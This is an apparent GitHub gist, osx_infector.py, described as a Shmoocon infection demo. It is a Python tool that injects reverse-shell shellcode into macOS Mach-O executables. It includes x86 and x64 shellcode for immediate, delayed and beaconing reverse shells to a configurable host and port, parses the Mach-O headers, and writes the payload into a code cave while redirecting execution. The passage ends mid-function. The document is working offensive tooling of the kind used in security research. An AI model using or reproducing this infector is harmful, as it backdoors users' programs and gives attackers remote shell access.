Skip to content

Instantly share code, notes, and snippets.

@secretsquirrel

secretsquirrel/osx_infector.py

Last active Mar 31, 2021
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
From Shmoocon infection demo
Raw
osx_infector.py
import os
import struct
import shutil
import subprocess
class macho_intel32_shellcode():
"""
Mach-O Intel x32 shellcode class
"""
def __init__(self, HOST='127.0.0.1', PORT=8080, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
)
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x41\x00\x00\x00"
self.shellcode2 += "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
#Time Check
self.shellcode2 += "\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
self.shellcode2 += "\x05" # add eax, 15 for seconds
self.shellcode2 += struct.pack("<I", self.BEACON)
self.shellcode2 += ("\x89\xC3" # mov ebx, eax
"\xB8\x74\x00\x00\x02\xcd\x80" # put system time in eax
"\x39\xD8" # cmp eax, ebx
"\x0F\x85\xf1\xff\xff\xff" # jne back to system time
"\xe9\x8E\xff\xff\xff\xff" # jmp back to FORK
)
#FORK to main program
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
#Modified from metasploit
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
self.shellcode2 = "\x68"
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += "\x68\xff\x02"
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += ("\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\xcd\x80\x85\xd2")
self.shellcode1 += "\x0f\x84"
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
class macho_intel64_shellcode():
"""
Mach-O Intel x64 shellcode Class
"""
def __init__(self, HOST, PORT, jumpLocation=0x0, SUPPLIED_SHELLCODE=None, BEACON=15):
self.HOST = HOST
self.PORT = PORT
self.jumpLocation = jumpLocation
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.BEACON = BEACON
self.shellcode = ""
def pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def delay_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def beaconing_reverse_shell_tcp(self):
if self.PORT is None:
print ("Must provide port")
return False
if self.HOST is None:
print ("This payload requires a HOST parameter -H")
return False
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2" # FORK
#fork
self.shellcode2 += "\x0f\x84" # TO TIME CHECK
self.shellcode2 += "\x6c\x00\x00\x00"
#self.shellcode1 = "\xe9\x6c\x00\x00\x00"
self.shellcode2 += ("\xb8"
"\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05\x49"
"\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6\x56\x48\xbe"
"\x00\x02"
)
self.shellcode2 += struct.pack(">H", self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x56\x48\x89\xe6\x6a\x10\x5a\x0f"
"\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8\x3b\x00\x00\x02"
"\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c"
"\x24\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05"
)
#TIME CHECK
self.shellcode2 += "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
"\xe9\x60\xff\xff\xff\xff" # jmp back to FORK
)
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
def delay_user_supplied_shellcode(self):
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
return False
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#From metasploit LHOST=127.0.0.1 LPORT=8080 Reverse Tcp
self.shellcode2 = "\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
self.shellcode2 += "\x48\x05"
self.shellcode2 += struct.pack("<I", self.BEACON) # add rax, 15 for seconds
self.shellcode2 += ("\x48\x89\xC3" # mov rbx, rax
"\xB8\x74\x00\x00\x02\x0f\x05" # put system time in rax
"\x48\x39\xD8" # cmp rax, rbx
"\x0F\x85\xf0\xff\xff\xff" # jne back to system time
)
self.shellcode2 += supplied_shellcode
self.shellcode1 = ("\xB8\x02\x00\x00\x02\x0f\x05\x85\xd2") # FORK()
self.shellcode1 += "\x0f\x84" # \x4c\x03\x00\x00" # <-- Points to LC_MAIN/LC_UNIXTREADS offset
if self.jumpLocation < 0:
self.shellcode1 += struct.pack("<I", len(self.shellcode1) + 0xffffffff + self.jumpLocation)
else:
self.shellcode1 += struct.pack("<I", len(self.shellcode2) + self.jumpLocation)
self.shellcode = self.shellcode1 + self.shellcode2
return (self.shellcode1 + self.shellcode2)
class machobin():
def __init__(self, FILE, OUTPUT=None, SHELL=None, HOST="127.0.0.1", PORT=8080,
SUPPORT_CHECK=False, SUPPLIED_SHELLCODE=None, FAT_PRIORITY="x64",
INJECTOR=False, DELETE_ORIGINAL=False,
):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.fat_hdrs = {}
self.mach_hdrs = {}
self.load_cmds = {}
self.ImpValues = {}
self.jumpLocation = 0x0
self.PORT = PORT
self.HOST = HOST
self.SHELL = SHELL
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.SUPPORT_CHECK = SUPPORT_CHECK
self.FAT_FILE = False
self.FAT_PRIORITY = FAT_PRIORITY
self.supported_CPU_TYPES = [0x7, # i386
0x01000007 # x64
]
self.INJECTOR = INJECTOR
self.DELETE_ORIGINAL = DELETE_ORIGINAL
def run_this(self):
'The Engine'
self.bin = open(self.FILE, 'r+b')
self.supported = ''
if self.SUPPORT_CHECK is True:
#Exit out either way
if not self.FILE:
print "You must provide a file to see if it is supported (-f)"
return False
try:
self.support_check()
except Exception, e:
print 'Exception:', str(e), '%s' % self.FILE
if self.supported is False:
print "%s is not supported." % self.FILE
return False
else:
print "%s is supported." % self.FILE
return True
self.support_check()
result = self.patch_macho()
return result
def support_check(self):
print "[*] Checking file support"
check = self.get_structure()
if check is False:
self.supported = False
for key, value in self.load_cmds.iteritems():
self.ImpValues[key] = self.find_Needed_Items(value)
if self.ImpValues[key]['text_segment'] == {}:
print '[!] Not a proper Mach-O file'
self.supported = False
def output_options(self):
"""
Output file check.
"""
if not self.OUTPUT:
self.OUTPUT = os.path.basename(self.FILE)
def set_shells(self, MagicNumber, ):
"This function sets the shellcode."
print "[*] Looking for and setting selected shellcode"
self.bintype = False
if MagicNumber == '0xfeedface':
#x86
self.bintype = macho_intel32_shellcode
elif MagicNumber == '0xfeedfacf':
#x64
self.bintype = macho_intel64_shellcode
if not self.SHELL:
print "You must choose a backdoor to add: "
for item in dir(self.bintype):
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
if self.SHELL not in dir(self.bintype):
print "The following %ss are available:" % str(self.bintype).split(".")[1]
for item in dir(self.bintype):
#print item
if "__" in item:
continue
elif ("returnshellcode" == item
or "pack_ip_addresses" == item
or "eat_code_caves" == item
or 'ones_compliment' == item
or 'resume_execution' in item
or 'returnshellcode' in item):
continue
else:
print " {0}".format(item)
return False
#else:
# shell_cmd = self.SHELL + "()"
self.shells = self.bintype(self.HOST, self.PORT, self.jumpLocation, self.SUPPLIED_SHELLCODE)
self.allshells = getattr(self.shells, self.SHELL)()
self.shellcode = self.shells.returnshellcode()
return self.shellcode
def get_structure(self):
'''This function grabs necessary data for the mach-o format'''
self.binary_header = self.bin.read(4)
if self.binary_header == "\xca\xfe\xba\xbe":
print '[*] Fat File detected'
self.FAT_FILE = True
ArchNo = struct.unpack(">I", self.bin.read(4))[0]
for arch in range(ArchNo):
self.fat_hdrs[arch] = self.fat_header()
for hdr, value in self.fat_hdrs.iteritems():
if int(value['CPU Type'], 16) in self.supported_CPU_TYPES:
self.bin.seek(int(value['Offset'], 16), 0)
self.mach_hdrs[hdr] = self.mach_header()
self.load_cmds[hdr] = self.parse_loadcommands(self.mach_hdrs[hdr])
if self.mach_hdrs is False:
return False
else:
#Not Fat Header
self.bin.seek(0)
self.mach_hdrs[0] = self.mach_header()
self.load_cmds[0] = self.parse_loadcommands(self.mach_hdrs[0])
def fat_header(self):
header = {}
header["CPU Type"] = hex(struct.unpack(">I", self.bin.read(4))[0])
header["CPU SubType"] = hex(struct.unpack(">I", self.bin.read(4))[0])
header["Offset"] = hex(struct.unpack(">I", self.bin.read(4))[0])
header["Size"] = hex(struct.unpack(">I", self.bin.read(4))[0])
header["Align"] = hex(struct.unpack(">I", self.bin.read(4))[0])
return header
def mach_header(self):
header = {}
header['beginningOfHeader'] = self.bin.tell()
try:
header['MagicNumber'] = hex(struct.unpack("<I", self.bin.read(4))[0])
except:
print "[!] Not a properly formated Mach-O file"
return False
header['CPU Type'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['CPU SubType'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['File Type'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['LOCLoadCmds'] = self.bin.tell()
header['Load Cmds'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['LOCSizeLdCmds'] = self.bin.tell()
header['Size Load Cmds'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['Flags'] = hex(struct.unpack("<I", self.bin.read(4))[0])
if header['MagicNumber'] == '0xfeedfacf':
header['Reserved'] = hex(struct.unpack("<I", self.bin.read(4))[0])
header['endOfHeader'] = self.bin.tell()
return header
def parse_loadcommands(self, someHdrs):
#print int(someHdrs['Load Cmds'], 16)
overall_cmds = []
for section in range(int(someHdrs['Load Cmds'], 16)):
cmds = {}
cmds['Command'] = struct.unpack("<I", self.bin.read(4))[0]
cmds['CommandSize'] = struct.unpack("<I", self.bin.read(4))[0]
cmds['LOCInFIle'] = self.bin.tell()
cmds['DATA'] = self.bin.read(int(cmds['CommandSize']) - 8)
cmds['last_cmd'] = self.bin.tell()
overall_cmds.append(cmds)
return overall_cmds
def find_Needed_Items(self, theCmds):
'''
This method returns a dict with commands that we need
for mach-o patching
'''
_tempDict = {}
text_segment = {}
text_section = {}
LC_MAIN = {}
LC_UNIXTREAD = {}
LC_CODE_SIGNATURE = {}
LC_DYLIB_CODE_SIGN_DRS = {}
locationInFIle = 0
last_cmd = 0
for item in theCmds:
locationInFIle = item['LOCInFIle']
if item['DATA'][0:6] == "__TEXT" and item['Command'] == 0x01:
text_segment = {
'segname': item['DATA'][0:0x10],
'VMAddress': item['DATA'][0x10:0x14],
'VMSize': item['DATA'][0x14:0x18],
'File Offset': item['DATA'][0x18:0x1C],
'File Size': item['DATA'][0x1C:0x20],
'MaxVMProt': item['DATA'][0x20:0x24],
'InitalVMProt': item['DATA'][0x24:0x28],
'NumberOfSections': item['DATA'][0x28:0x2C],
'Flags': item['DATA'][0x2C:0x30]
}
count = struct.unpack("<I", text_segment['NumberOfSections'])[0]
i = 0
while count > 0:
if '__text' in item['DATA'][0x30 + i:0x40 + i]:
text_section = {
'sectionName': item['DATA'][0x30 + i:0x40 + i],
'segmentName': item['DATA'][0x40 + i:0x50 + i],
'Address': item['DATA'][0x50 + i:0x54 + i],
'LOCAddress': locationInFIle + 0x50 + i,
'Size': item['DATA'][0x54 + i:0x58 + i],
'LOCTextSize': locationInFIle + 0x54 + i,
'Offset': item['DATA'][0x58 + i:0x5c + i],
'LocTextOffset': locationInFIle + 0x58 + i,
'Alignment': item['DATA'][0x5c + i:0x60 + i],
'Relocations': item['DATA'][0x60 + i:0x64 + i],
'NumberOfRelocs': item['DATA'][0x64 + i:0x68 + i],
'Flags': item['DATA'][0x68 + i:0x6c + i],
'Reserved1': item['DATA'][0x6c + i:0x70 + i],
'Reserved2': item['DATA'][0x70 + i:0x74 + i],
}
break
else:
count -= 1
i += 0x40
elif item['DATA'][0:6] == "__TEXT" and item['Command'] == 0x19:
text_segment = {
'segname': item['DATA'][0:0x10],
'VMAddress': item['DATA'][0x10:0x18],
'VMSize': item['DATA'][0x18:0x20],
'File Offset': item['DATA'][0x20:0x28],
'File Size': item['DATA'][0x28:0x30],
'MaxVMProt': item['DATA'][0x30:0x34],
'InitalVMProt': item['DATA'][0x34:0x38],
'NumberOfSections': item['DATA'][0x38:0x3C],
'Flags': item['DATA'][0x3c:0x40]
}
count = struct.unpack("<I", text_segment['NumberOfSections'])[0]
i = 0
while count > 0:
if '__text' in item['DATA'][0x40 + i:0x50 + i]:
text_section = {
'sectionName': item['DATA'][0x40 + i:0x50 + i],
'segmentName': item['DATA'][0x50 + i:0x60 + i],
'Address': item['DATA'][0x60 + i:0x68 + i],
'LOCAddress': locationInFIle + 0x60 + i,
'Size': item['DATA'][0x68 + i:0x70 + i],
'LOCTextSize': locationInFIle + 0x68 + i,
'Offset': item['DATA'][0x70 + i:0x74 + i],
'LocTextOffset': locationInFIle + 0x70 + i,
'Alignment': item['DATA'][0x74 + i:0x78 + i],
'Relocations': item['DATA'][0x78 + i:0x7c + i],
'NumberOfRelocs': item['DATA'][0x7c + i:0x80 + i],
'Flags': item['DATA'][0x80 + i:0x84 + i],
'Reserved1': item['DATA'][0x84 + i:0x88 + i],
'Reserved2': item['DATA'][0x88 + i:0x8c + i],
'Reserved3': item['DATA'][0x8c + i:0x90 + i],
}
break
else:
count -= 1
i += 0x4c
if item['Command'] == 0x80000028:
LC_MAIN = {
'LOCEntryOffset': locationInFIle,
'EntryOffset': item['DATA'][0x0:0x8],
'StackSize': item['DATA'][0x8:0x16]
}
elif item['Command'] == 0x00000005 and struct.unpack("<I", item['DATA'][0x0:0x4])[0] == 0x01:
LC_UNIXTREAD = {
'LOCEntryOffset': locationInFIle,
'Flavor': item['DATA'][0x00:0x04],
'Count': item['DATA'][0x04:0x08],
'eax': item['DATA'][0x08:0x0C],
'ebx': item['DATA'][0x0C:0x10],
'ecx': item['DATA'][0x10:0x14],
'edx': item['DATA'][0x14:0x18],
'edi': item['DATA'][0x18:0x1C],
'esi': item['DATA'][0x1C:0x20],
'ebp': item['DATA'][0x20:0x24],
'esp': item['DATA'][0x24:0x28],
'ss': item['DATA'][0x28:0x2C],
'eflags': item['DATA'][0x2C:0x30],
'LOCeip': locationInFIle + 0x30,
'eip': item['DATA'][0x30:0x34],
'cs': item['DATA'][0x34:0x38],
'ds': item['DATA'][0x38:0x3C],
'es': item['DATA'][0x3C:0x40],
'fs': item['DATA'][0x40:0x44],
'gs': item['DATA'][0x44:0x48],
}
elif item['Command'] == 0x00000005 and struct.unpack("<I", item['DATA'][0x0:0x4])[0] == 0x04:
LC_UNIXTREAD = {
'LOCEntryOffset': locationInFIle,
'Flavor': item['DATA'][0x00:0x04],
'Count': item['DATA'][0x04:0x08],
'rax': item['DATA'][0x08:0x10],
'rbx': item['DATA'][0x10:0x18],
'rcx': item['DATA'][0x18:0x20],
'rdx': item['DATA'][0x20:0x28],
'rdi': item['DATA'][0x28:0x30],
'rsi': item['DATA'][0x30:0x38],
'rbp': item['DATA'][0x38:0x40],
'rsp': item['DATA'][0x40:0x48],
'r8': item['DATA'][0x48:0x50],
'r9': item['DATA'][0x50:0x58],
'r10': item['DATA'][0x58:0x60],
'r11': item['DATA'][0x60:0x68],
'r12': item['DATA'][0x68:0x70],
'r13': item['DATA'][0x70:0x78],
'r14': item['DATA'][0x78:0x80],
'r15': item['DATA'][0x80:0x88],
'LOCrip': locationInFIle + 0x88,
'rip': item['DATA'][0x88:0x90],
'rflags': item['DATA'][0x90:0x98],
'cs': item['DATA'][0x98:0xA0],
'fs': item['DATA'][0xA0:0xA8],
'gs': item['DATA'][0xA8:0xB0],
}
if item['Command'] == 0x000001D:
LC_CODE_SIGNATURE = {
'Data Offset': item['DATA'][0x0:0x4],
'Data Size': item['DATA'][0x0:0x8],
}
if item['Command'] == 0x0000002B:
LC_DYLIB_CODE_SIGN_DRS = {
'Data Offset': item['DATA'][0x0:0x4],
'Data Size': item['DATA'][0x0:0x8],
}
if item['last_cmd'] > last_cmd:
last_cmd = item['last_cmd']
_tempDict = {'text_segment': text_segment, 'text_section': text_section,
'LC_MAIN': LC_MAIN, 'LC_UNIXTREAD': LC_UNIXTREAD,
'LC_CODE_SIGNATURE': LC_CODE_SIGNATURE,
'LC_DYLIB_CODE_SIGN_DRS': LC_DYLIB_CODE_SIGN_DRS,
'last_cmd': last_cmd
}
return _tempDict
def patch_macho(self):
if self.supported is False:
print self.FILE, "is not supported."
return False
self.output_options()
if self.INJECTOR is False and self.DELETE_ORIGINAL is False:
if not os.path.exists("backdoored"):
os.makedirs("backdoored")
os_name = os.name
if os_name == 'nt':
self.backdoorfile = "backdoored\\" + self.OUTPUT
else:
self.backdoorfile = "backdoored/" + self.OUTPUT
shutil.copy2(self.FILE, self.backdoorfile)
else:
self.backdoorfile = self.FILE
for key, value in self.mach_hdrs.iteritems():
MagicNumber = value['MagicNumber']
text_section = self.ImpValues[key]['text_section']
last_cmd = self.ImpValues[key]['last_cmd']
LC_MAIN = self.ImpValues[key]['LC_MAIN']
LC_UNIXTREAD = self.ImpValues[key]['LC_UNIXTREAD']
if self.binary_header == "\xca\xfe\xba\xbe":
offset = int(self.fat_hdrs[key]['Offset'], 16)
else:
offset = 0x0
LC_CODE_SIGNATURE = self.ImpValues[key]['LC_CODE_SIGNATURE']
LC_DYLIB_CODE_SIGN_DRS = self.ImpValues[key]['LC_DYLIB_CODE_SIGN_DRS']
patchx64 = True
patchx86 = True
if self.FAT_FILE is True and self.FAT_PRIORITY != 'ALL':
if self.FAT_PRIORITY.lower() == 'x64':
patchx86 = False
if self.FAT_PRIORITY.lower() == 'x86':
patchx64 = False
with open(self.backdoorfile, 'r+b') as bin:
if MagicNumber == '0xfeedfacf' and patchx64 is True:
print "[*] Patching x86_64 Mach-O Binary"
cave_size = struct.unpack("<I", text_section['Offset'])[0] + offset - last_cmd
print "[*] Pre-text section 'code cave' size:", hex(cave_size)
resultShell = self.set_shells(MagicNumber)
if not resultShell:
print "[!] Could not set shell"
return False
if len(self.shellcode) > cave_size:
print "[!] Shellcode is larger than available space"
return False
startingLocation = struct.unpack("<I", text_section['Offset'])[0] + offset - len(self.shellcode)
if LC_UNIXTREAD != {}:
print "[*] ...with LC_UNIXTREAD format"
#print 'LC_UNIXTREAD', struct.unpack("<Q", LC_UNIXTREAD['rip'])[0], struct.unpack("<Q", text_section['Address'])[0]
if struct.unpack("<Q", LC_UNIXTREAD['rip'])[0] - struct.unpack("<Q", text_section['Address'])[0] != 0x0:
self.jumpLocation = struct.unpack("<Q", LC_UNIXTREAD['rip'])[0] - struct.unpack("<Q", text_section['Address'])[0]
else:
print "[*] ...with LC_MAIN format"
#print struct.unpack("<Q", LC_MAIN['EntryOffset'])[0], struct.unpack("<I", text_section['Offset'])[0]
if struct.unpack("<Q", LC_MAIN['EntryOffset'])[0] - struct.unpack("<I", text_section['Offset'])[0] != 0x0:
self.jumpLocation = struct.unpack("<Q", LC_MAIN['EntryOffset'])[0] - struct.unpack("<I", text_section['Offset'])[0]
resultShell = self.set_shells(MagicNumber)
if not resultShell:
print "[!] Could not set shell"
return False
#print 'shellcode:', self.shellcode.encode('hex')
bin.seek(startingLocation, 0)
bin.write(self.shellcode)
bin.seek(text_section['LOCAddress'], 0)
newAddress = struct.unpack("<Q", text_section['Address'])[0] - len(self.shellcode)
bin.write(struct.pack("<Q", newAddress))
newSize = struct.unpack("<Q", text_section['Size'])[0] + len(self.shellcode)
bin.write(struct.pack("<Q", newSize))
